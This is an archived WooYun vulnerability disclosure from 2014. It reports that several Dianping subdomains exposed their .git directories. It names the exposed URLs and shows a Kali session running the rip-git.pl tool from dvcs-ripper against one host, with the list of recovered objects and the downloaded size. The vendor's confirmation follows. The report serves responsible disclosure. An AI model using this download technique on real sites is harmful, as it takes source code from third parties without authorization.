乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-30: 细节已通知厂商并且等待厂商处理中 2014-12-30: 厂商已经确认,细节仅向厂商公开 2015-01-09: 细节向核心白帽子及相关领域专家公开 2015-01-19: 细节向普通白帽子公开 2015-01-29: 细节向实习白帽子公开 2015-02-13: 细节向公众公开
大众点评多个分站源码可被下载
http://app.t.dianping.com/.git/confighttp://wap.dianping.com/.git/confighttp://stat.api.dianping.com/.git/config WooYun: 友盟网git服务使用不当导致源代码泄露
[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true
root@kali:~/dvcs-ripper# perl rip-git.pl -v -u http://stat.api.dianping.com/.git[i] Downloading git files from http://stat.api.dianping.com/.git[d] found COMMIT_EDITMSG[d] found config[d] found description[d] found HEAD[d] found index[!] Not found for packed-refs: 404 Not Found[!] Not found for objects/info/alternates: 404 Not Found[!] Not found for info/grafts: 404 Not Found[d] found logs/HEAD[!] Not found for objects/53/d18de3c95a38a7d1835f84c44fe98ca3931ee7: 404 Not Found[!] Not found for objects/c1/f15474ea70965c7b7d2889ef16fa949707b815: 404 Not Found[d] found refs/heads/master[i] Running git fsck to check for missing itemsChecking object directories: 100% (256/256), done.error: HEAD: invalid sha1 pointer dd9554a21996403b0189e476d4b9785d71e07a71error: refs/heads/master does not point to a valid object![d] found objects/02/62ed39be1a9164ae28b70c88ba5d8c39c41539[d] found objects/06/0c87968d255d922b58bbcc0ece7c656995107b[d] found objects/0b/1262e7608b1945648ddffccbde1ff139fa5622[d] found objects/0f/144685f7140d2694eeba5609322b4cd79f0bf8[d] found objects/0f/d275e94660402f80f01505d28b90a23f7e0209[d] found objects/11/5030dc889ca5f267bf2caf121ff3d3c2db277b[d] found objects/14/3edf44b0daa4cef1a452ecccac21aee22a8d77[d] found objects/1a/740d15247e7d136b2d2f452cefc4aa842a4c7b[d] found objects/1d/eef144cb17ed2c11c6cdcdcb2d9530fa8d0b47[d] found objects/1d/425cf7d7e25f81be64d32c406ff66cfb6c4766
du -h
24M ./objects4.0K ./info4.0K ./logs/refs/remotes4.0K ./logs/refs/heads12K ./logs/refs20K ./logs4.0K ./refs/remotes8.0K ./refs/heads4.0K ./refs/tags20K ./refs24M .
删除
危害等级:中
漏洞Rank:8
确认时间:2014-12-30 16:28
感谢对大众点评网安全的关注
2014-12-30:线上机器运维自动化管理系统的部分代码,所有的URL均不涉及业务代码。